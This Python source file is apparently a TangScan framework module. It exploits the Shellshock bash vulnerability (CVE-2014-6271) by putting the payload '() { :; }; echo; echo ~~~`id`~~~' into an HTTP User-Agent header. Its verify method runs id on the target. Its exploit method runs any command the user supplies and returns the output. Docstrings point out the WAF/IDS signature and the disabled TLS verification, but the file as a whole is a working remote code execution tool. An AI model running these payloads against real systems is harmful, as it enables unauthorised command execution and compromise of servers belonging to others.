#! /usr/bin/env python
# -*- coding: utf-8 -*-
import re
from thirdparty import requests
from modules.exploit import TSExploit
# Public API of this module: the framework loads the module class by this name.
__all__ = ['TangScan']
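class TangScan(TSExploit):
    """TangScan check module for CVE-2014-6271 ("Shellshock") in bash 3.0-4.3.

    Both ``verify`` and ``exploit`` send a single GET request whose
    User-Agent header carries the trigger string and then look for the
    ``~~~...~~~`` markers in the response body; the target is reported as
    vulnerable only when the marker-wrapped output comes back.

    Defensive notes (for readers using this as a detection reference): the
    observable indicator is the ``() { :; };`` function-definition prefix
    inside an HTTP header value, which is the well-known signature for this
    CVE in WAF/IDS rules; a bash build patched for CVE-2014-6271 does not
    execute text following the function body. The module also performs its
    request with ``verify=False`` (no TLS certificate validation), which is
    inherited from the original implementation.
    """

    # Delimiters the payload wraps the command output in. A response is only
    # accepted when it *starts* with the marker and contains a marker pair.
    _MARKER = '~~~'
    _OUTPUT_RE = re.compile(r'~~~(.*?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)

    def __init__(self):
        # The original used ``super(self.__class__, self)``, which recurses
        # forever as soon as this class is subclassed; name the class instead.
        super(TangScan, self).__init__()
        self.info = {
            "name": "bash 远程代码执行漏洞",
            "product": "bash",
            "product_version": "3.0-4.3",
            "desc": """
            bash 3.0-4.3 存在一个漏洞,该漏洞可以通过构造环境变量的值来执行任意的脚本代码
            """,
            "license": self.license.TS,
            "author": ["wooyun"],
            "ref": [
                {self.ref.url: "https://www.invisiblethreat.ca/2014/09/cve-2014-6271/"},
            ],
            "type": self.type.rce,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "2014-09-17",
            "create_date": "2014-09-17"
        }
        # "url" is the only required option; "cmd" is used by exploit() only.
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "target url"
            },
            "cmd": {
                "default": "id",
                "required": False,
                "choices": [],
                "convert": self.convert.str_field,
                "desc": "command"
            }
        })
        self.register_result({
            "status": False,
            "data": {
                'cmd_info': {
                    'cmd': '',
                    'output': ''
                }
            },
            "description": "",
            "error": ""
        })

    def _probe(self, exp_headers):
        """Send the probe request and return the marker-wrapped output, or None.

        Args:
            exp_headers: dict of HTTP headers to send with the GET request.

        Returns:
            The first ``~~~...~~~`` capture from the response body, or None
            when the request failed (the error text is stored in
            ``self.result.error``) or the body does not start with the marker
            / contains no marker pair. Both None paths leave the result's
            status untouched, mirroring the original early returns.
        """
        try:
            # NOTE: verify=False disables TLS certificate validation, as in the
            # original module; the probe can therefore be intercepted in transit.
            response = requests.get(self.option.url, headers=exp_headers, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return None
        body = response.content
        matches = self._OUTPUT_RE.findall(body)
        if not body.startswith(self._MARKER) or not matches:
            return None
        return matches[0]

    def verify(self):
        """Check the target with a fixed ``id`` command and fill ``self.result``.

        On a positive match sets ``status``, stores the echoed output in
        ``data.cmd_info.output`` and writes a human-readable description.
        """
        exp_headers = {'user-agent': r'''() { :; }; echo; echo ~~~`id`~~~'''}
        output = self._probe(exp_headers)
        if output is None:
            return
        self.result.status = True
        self.result.data.cmd_info.output = output
        # The template references ``{url}``; the original passed the value as
        # ``host=``, so every positive verification raised KeyError here.
        self.result.description = "目标 {url} 存在 bash 远程代码执行漏洞, 执行 id 命令结果: {cmd_info}".format(
            url=self.option.url,
            cmd_info=output
        )

    def exploit(self):
        """Same probe as ``verify`` but runs the configured ``cmd`` option.

        On a positive match also records the command that was sent in
        ``data.cmd_info.cmd``.
        """
        exp_headers = {
            'user-agent': '() {{ :; }}; echo; echo ~~~`{command}`~~~'.format(command=self.option.cmd)
        }
        output = self._probe(exp_headers)
        if output is None:
            return
        self.result.status = True
        self.result.data.cmd_info.cmd = self.option.cmd
        self.result.data.cmd_info.output = output
        # Same ``host=`` vs ``{url}`` mismatch as in verify(): fixed to ``url=``.
        self.result.description = "目标 {url} 存在 bash 远程代码执行漏洞, 执行 {cmd} 命令结果: {cmd_info}".format(
            url=self.option.url,
            cmd=self.option.cmd,
            cmd_info=output
        )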
if __name__ == '__main__':
    # Run the module through the framework's command-line driver.
    from modules.main import main

    module_instance = TangScan()
    main(module_instance)